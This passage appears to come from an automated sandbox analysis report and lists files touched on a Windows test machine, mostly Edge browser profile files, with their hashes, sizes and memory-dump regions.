c4aa97305afc936b58d16a016a7d0f17ffacb0b2d4985cea1e0dd07c865f98f3

SHA512
5abce10798cfcbbe3d4e98ac2488efb21f78d14e1fe0eaf346fd06948d2c97f1f40b79e66202b312474fc19b61f44849c0658ce89be8b5f9454ae7f77015a69a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
690B

MD5
9fe5c75e581de39a44fb3d14a7651cc8

SHA1
12ec7134f4cf5c453963d9ff6259d9e2e73c5605

SHA256
d9baecef63fb068c671ff60aac59bed6c748b0d6e0f93ca1263ca7c3cbe4741c

SHA512
dfc9302cac2e4626f36de43490ef053d946935a03b1f0b29ade0b838367e0c361aef9e9c242193c893dfcfe4b5345fdfe2cc059a5eb357b8ee404c7203ae6fc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
0c5146f839ee543e3149db407ce6c67d

SHA1
77857d60ff617bf4ca9b28cb81c9e00793e3f579

SHA256
a1a1237b6feb97f1662fb5f44d872f5d1d9f6bfae1371bf62f825181ca94092f

SHA512
a5d2a127e8abf2006c1dc57759ebf6de5966441f5c1c373a1781efb7ed9794c0402490a1cf371dd5d64c182954237ec3a324df17038fd35f3587c98fc7f1423f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
4KB

MD5
9569ba618ea192911e04e23c1559673b

SHA1
7dae83cac6049a19a9bead889f3a91e9b60d158a

SHA256
91a4dc7061394b4aab830e817cbe64192b2d9e9e2e6b1bbaa56850b7367e6fec

SHA512
9aac149d86295881765a39b903a3cde15d361a6ed0203b329df9da05d8092f345a3593a693aaf109700b19d98bf55a791946b32a17ea8288158c7be53d3a6cf6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
fa9f62ea0fb481f68edd8a25f9e8a41f

SHA1
a06ed55252c7da6e7414a6e29d005b19c25526f1

SHA256
e3a53180bc0e1d1a35453c3018520f6c6d212f1e3acd147e6f099cc25f147e53

SHA512
d3139031d3e4323112e209652b2aade29a31a8afca2fcd9ed38cd75cd00059ec1a07b4942f022148e432ee7169071c33153532ebc51cd2e51c82dbbfba565fb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
Filesize
24KB

MD5
1463bf2a54e759c40d9ad64228bf7bec

SHA1
2286d0ac3cfa9f9ca6c0df60699af7c49008a41f

SHA256
9b4fd2eea856352d8fff054b51ea5d6141a540ca253a2e4dc28839bc92cbf4df

SHA512
33e0c223b45acac2622790dda4b59a98344a89094c41ffdb2531d7f1c0db86a0ea4f1885fea7c696816aa4ceab46de6837cc081cd8e63e3419d9fcb8c5a0eb66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000001.dbtmp
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
367B

MD5
de5cdf6d2847a3ce272ae408c9fd20fe

SHA1
1495c017aa509a2d203deb6cb26d43abbb63fab2

SHA256
e7212375e49dc8dda5d506db4409c731bbe018c7bdc8072b58acef752eaa84d9

SHA512
cb0947792a0d53d4ce3f77cb98afbd83afc628cc7d6d8547a704a9d260127895524def6253ebf09e6a44bcc462c52393185df3522c1e7cb276cc8a8cc8015463

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57e87b.TMP
Filesize
201B

MD5
bb1be66c4b8fe695ecf97f2075eae2b8

SHA1
42de1ecccd53f3c97fa1a251f4858a7404f9c96b

SHA256
6d12888ea49a4cf1341ef1d7906e50b22c7473951ef7ce92893e0d6f123e6f29

SHA512
de36213cae1b91d84c59e7c890e35cfc29ea86541a85ac5e7c06688bdd79fdf2e32cae8b86555077cdd753042e611e24be5ffdbdf9880cb0ea6ce99d28a068b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001
Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
9KB

MD5
bb66176ccc9ea672d7c6de4c9d3c6660

SHA1
574836fc3548ea01b372aa3893c7d8e936aa8efe

SHA256
5479fe3ebfe6fbd5fb52347db3cd3b1ea990419ed14ef379daf878979e3276b3

SHA512
450de7e97f5edb311fc33b8a0c67f47f65e02cde398bccb36e0c37ae4e305a458af1f13fe17475f727ece36e90c36a3b200c1e7ec25c4c36dd50b44aa8f9813e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
acb20d3dbee5b9eef3ead9b9221ecbcf

SHA1
aaec00270e14e36da3cbb0bc1bb803c37b9197df

SHA256
9a3bd50859707f867aff525fea353ca31218dc2b03a9b7d4810ffb29c2ce6d97

SHA512
4ec7e23a65a0de25c0cd66fad1523115245ce8ab4f9e0ecb1efcad43c15e0f8cd28ede5d7a92006877f7a0858a9deea2bcda33b3be6c0daf40c1b1562b79b620

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_py34rjac.mlw.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize
3KB

MD5
5dde75cdaed962f233df10b7c390d478

SHA1
1aca7f37844911fd228d9307b8aede193732e7c0

SHA256
15c11402e21d524f4e8696a87ecefd350902c6fbffb74e41f211950fa3e10dc9

SHA512
60bcd9c8c5d23f594bc592582e8f10f2c050d49b7a0337be6fae9c27ff1d2332c9c760ee37c10769dc30a423edbf1713929f1b4a5c036a4479caa2741be875f0

Download Submit
\??\pipe\LOCAL\crashpad_2712_PKBWNGUTJKSRFUAA
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/524-139-0x00007FFD1F7E0000-0x00007FFD1F7F0000-memory.dmp

Filesize
64KB

Download
memory/524-138-0x00007FFD1F7E0000-0x00007FFD1F7F0000-memory.dmp

Filesize
64KB

Download
memory/524-134-0x00007FFD220B0000-0x00007FFD220C0000-memory.dmp

Filesize
64KB

Download
memory/524-135-0x00007FFD220B0000-0x00007FFD220C0000-memory.dmp

Filesize
64KB

Download
memory/524-136-0x00007FFD220B0000-0x00007FFD220C0000-memory.dmp

Filesize
64KB

Download
memory/524-133-0x00007FFD220B0000-0x00007FFD220C0000-memory.dmp

Filesize
64KB

Download
memory/524-137-0x00007FFD220B0000-0x00007FFD220C0000-memory.dmp

Filesize
64KB

Download
memory/4316-164-0x0000020A57980000-0x0000020A57990000-memory.dmp

Filesize
64KB

Download
memory/4316-271-0x0000020A57980000-0x0000020A57990000-memory.dmp

Filesize
64KB

Download
memory/4316-162-0x0000020A59310000-0x0000020A59332000-memory.dmp

Filesize
136KB

Download
memory/4316-163-0x0000020A57980000-0x0000020A57990000-memory.dmp

Filesize
64KB

Download
memory/4316-270-0x0000020A57980000-0x0000020A57990000-memory.dmp

Filesize
64KB

Download
memory/4316-165-0x0000020A57980000-0x0000020A57990000-memory.dmp

Filesize
64KB

Download
memory/4316-269-0x0000020A57980000-0x0000020A57990000-memory.dmp

Filesize
64KB

Download